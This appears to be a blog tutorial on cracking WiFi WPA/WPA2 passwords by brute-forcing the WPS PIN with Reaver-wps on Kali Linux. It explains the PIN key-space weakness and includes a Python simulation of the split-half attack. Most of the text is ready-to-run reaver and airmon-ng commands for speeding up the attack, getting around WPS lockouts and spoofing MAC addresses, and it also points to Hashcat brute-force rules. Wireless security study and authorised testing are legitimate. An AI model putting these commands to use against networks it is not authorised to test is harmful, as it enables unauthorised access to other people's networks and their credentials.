Reaver-wps performs a brute force attack against an access point's WiFi Protected Setup PIN. Once the WPS PIN is found, the WPA PSK can be recovered and, alternatively, the AP's wireless settings can be reconfigured. This post outlines the steps and commands that help crack WiFi WPA/WPA2 passwords using Reaver-WPS.
While Reaver-wps does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS PIN is known.
Readers, note that I've since written another post where I cracked a password in 14.21 seconds using a pyrit, cowpatty and WiFite combination attack with a dictionary. The whole process takes less than 10 minutes.
Those who would like to try more ways of cracking WiFi WPA/WPA2 passwords can also use Hashcat (or cudaHashcat or oclHashcat) to crack unknown WPA/WPA2 passwords. The benefit of using Hashcat is that you can write your own rules to match a pattern and run a brute-force attack. This is an alternative to a dictionary attack, where the dictionary can only contain a certain number of words, whereas a brute-force attack lets you try every possible combination of a given charset. Hashcat can crack WiFi WPA/WPA2 passwords and can also be used to crack MD5, phpBB, MySQL and SHA1 hashes. Hashcat is a good choice because if you can guess one or two characters of the password, it only takes a few minutes. For example, if you know three characters of the password it takes 12 minutes to crack it; if you know four characters, it takes three minutes (the actual time depends on the password length, the charset and the GPU you have). You can write rules that only try letters and numbers to crack a completely unknown password if you know that a certain router's default passwords contain only those. The chance of cracking the password is a lot higher this way.
Important Note: Many users try to capture with network cards that are not supported. You should buy a card that supports Kali Linux, including packet injection and monitor mode. A list can be found in 802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you'll just be wasting time and effort on something that simply won't do the job.
Description:
Reaver-wps targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and will also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP's 8-digit PIN. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver-wps performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8-digit PIN. Since the PIN is all numeric, there are 10^8 (100,000,000) possible values for any given PIN. However, because the last digit of the PIN is a checksum value which can be calculated from the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the PIN in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the PIN and 10^3 (1,000) possible values for the second half of the PIN, with the last digit of the PIN being a checksum.
Reaver-wps brute forces the first half of the PIN and then the second half of the PIN, meaning that the entire key space for the WPS PIN can be exhausted in 11,000 attempts. The speed at which Reaver can test PINs is limited only by the speed at which the AP can process WPS requests. Some APs are fast enough that one PIN can be tested every second; others are slower and only allow one PIN every 10 seconds. Statistically, it will only take about half of that time to guess the correct PIN (on average roughly 1.5 hours at one PIN per second, or about 15 hours at one PIN every 10 seconds).
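The key-space reduction described above, worked through in code. This is an added example, not code from the original post or from Reaver itself: it implements the WPS PIN checksum (the spec's alternating 3,1,3,1,3,1,3 digit weights, chosen so the weighted sum is a multiple of 10), and a constructed FakeAp oracle that, like a real AP, reveals whether the first four digits are right before the last four are ever checked. brute_force() walks the halves in the same order Reaver does, so the attempt counter shows why the worst case is 10,000 + 1,000 = 11,000 requests rather than 10^7. The PIN values, the FakeAp class and its method names are assumptions made for the example.

```python
"""WPS PIN key space: checksum digit and split-half brute force.

Added example, not part of the original post or of Reaver's source.
FakeAp is a constructed stand-in for an access point; it models the
WPS behaviour the post describes (M4/M6 validate the two PIN halves
separately) and nothing else.
"""

from typing import Tuple

# Worst case per the post: every first half, then every second half.
MAX_ATTEMPTS = 10_000 + 1_000


def wps_checksum(first_seven: int) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN prefix.

    Digits are weighted 3,1,3,1,3,1,3 (the pattern is symmetric, so the
    walk from least significant digit gives the same result) and the
    checksum is the digit that makes the total a multiple of 10.
    """
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("prefix must be 7 decimal digits")
    total = 0
    remaining = first_seven
    for weight in (3, 1, 3, 1, 3, 1, 3):
        total += weight * (remaining % 10)
        remaining //= 10
    return (10 - total % 10) % 10


def wps_pin(first_seven: int) -> str:
    """Build the full 8-digit PIN (7 digits plus checksum), zero-padded."""
    return f"{first_seven:07d}{wps_checksum(first_seven)}"


def is_valid_pin(pin: str) -> bool:
    """True when the PIN is 8 digits and its last digit is the checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_pin(int(pin[:7])) == pin


class FakeAp:
    """Constructed AP oracle (assumption for this example).

    A real AP NACKs after M4 when the first half is wrong and after M6
    when the second half is wrong, which is exactly the per-half leak
    this class reproduces. `requests` counts PIN attempts made.
    """

    def __init__(self, pin: str) -> None:
        if not is_valid_pin(pin):
            raise ValueError("AP PIN must carry a valid checksum")
        self._pin = pin
        self.requests = 0

    def check_first_half(self, half: str) -> bool:
        self.requests += 1
        return half == self._pin[:4]

    def check_second_half(self, first: str, second: str) -> bool:
        self.requests += 1
        return first == self._pin[:4] and second == self._pin[4:]


def brute_force(ap: FakeAp) -> Tuple[str, int]:
    """Recover the PIN the way Reaver does: first half, then second half.

    Returns (pin, number_of_attempts). The second-half loop only tries
    the 1,000 three-digit tails and computes the checksum digit for each,
    so it never sends a PIN the AP would reject on checksum alone.
    """
    first = None
    for i in range(10_000):
        candidate = f"{i:04d}"
        if ap.check_first_half(candidate):
            first = candidate
            break
    if first is None:
        raise RuntimeError("no first half matched; AP is not behaving as modelled")

    for j in range(1_000):
        tail = f"{j:03d}"
        second = tail + str(wps_checksum(int(first + tail)))
        if ap.check_second_half(first, second):
            return first + second, ap.requests
    raise RuntimeError("no second half matched; AP is not behaving as modelled")


def attack_time_seconds(attempts: int, seconds_per_attempt: float) -> float:
    """Wall-clock estimate: the AP's WPS request rate is the only limit."""
    return attempts * seconds_per_attempt


if __name__ == "__main__":
    ap = FakeAp("12345670")  # assumed target PIN, chosen for the demo
    pin, attempts = brute_force(ap)
    print(f"recovered {pin} after {attempts} attempts "
          f"(worst case {MAX_ATTEMPTS}, i.e. "
          f"{attack_time_seconds(MAX_ATTEMPTS, 1.0) / 3600:.1f} h at 1 PIN/s)")
```

Run it as a script to see the attempt count for the assumed PIN; change the PIN passed to FakeAp to see how the count moves between a handful of requests and the 11,000 ceiling, and pass 10.0 to attack_time_seconds() to model a slow AP.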
Installation:
Install Kali Linux; everything needed is built into it (Reaver-wps, libpcap and libsqlite3).
Usage:
Usually, the only required arguments to Reaver-wps are the interface name and the BSSID of the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05
The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver-wps, unless explicitly specified on the command line:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
By default, if the AP switches channels, Reaver-wps will also change its channel accordingly. However, this feature may be disabled by fixing the interface's channel:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (the minimum timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay period between PIN attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for 5 minutes or less, when "suspicious" activity is detected. By default, when a locked state is detected, Reaver-wps will check the state every 315 seconds (5 minutes and 15 seconds) and will not continue brute forcing PINs until the WPS state is unlocked. This check interval can be increased or decreased to any non-negative integer value:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each PIN as it is attempted:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (the maximum timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Some poor WPS implementations will drop a connection on the floor when an invalid PIN is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKs (most do), this feature can be disabled to ensure better reliability. This option is largely unnecessary, as Reaver-wps will auto-detect whether an AP properly responds with NACKs or not:
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but it can be enabled for those APs that need it:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting PIN attempts or is simply overloaded, a sleep can be put in place that will occur whenever these warning messages appear:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
More on Basic Usage
First, make sure your wireless card is in monitor mode:
# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose information about Reaver's progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver-wps has a 1 second delay between PIN attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing
In some cases you may want or need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface, then create the monitor interface from it, and pass the same address to Reaver. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
Supported Wireless Drivers
The following wireless drivers have been tested or reported to work successfully with Reaver-wps:
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
Partially Supported
The following wireless drivers have had mixed success, and may or may not work depending on your wireless card (i.e., if you are having problems with these drivers/cards, consider trying a new card before submitting a problem ticket):
ath5k
iwlagn
rtl2800usb (using the latest compat-wireless drivers has fixed many users' problems, hint hint...)
b43
Not Supported
The following wireless drivers/cards have been tested or reported to not work properly with Reaver:
iwl4965
RT3070L
Netgear WG111v3
Conclusion
If you want to pentest or hack your WiFi passwords, then the first thing you need is a compatible WiFi card. Most WiFi cards are priced between $15 and $35 USD. I see no point struggling with an unsupported card when you can just invest those extra bucks and that card will last you for years. You get to learn how to pentest or hack WiFi passwords, how to inject, spoof, and set up a fake AP or honeypot. See the list of supported USB WiFi adapter cards that work in Kali Linux and are available on Amazon.
Related post: Speed up WPA/WPA2 cracking with Pyrit and CUDA and leveraging Wifite [This post is now replaced and updated by the next one below]
Cracking WiFi WPA/WPA2 passwords using pyrit and cowpatty in Kali Linux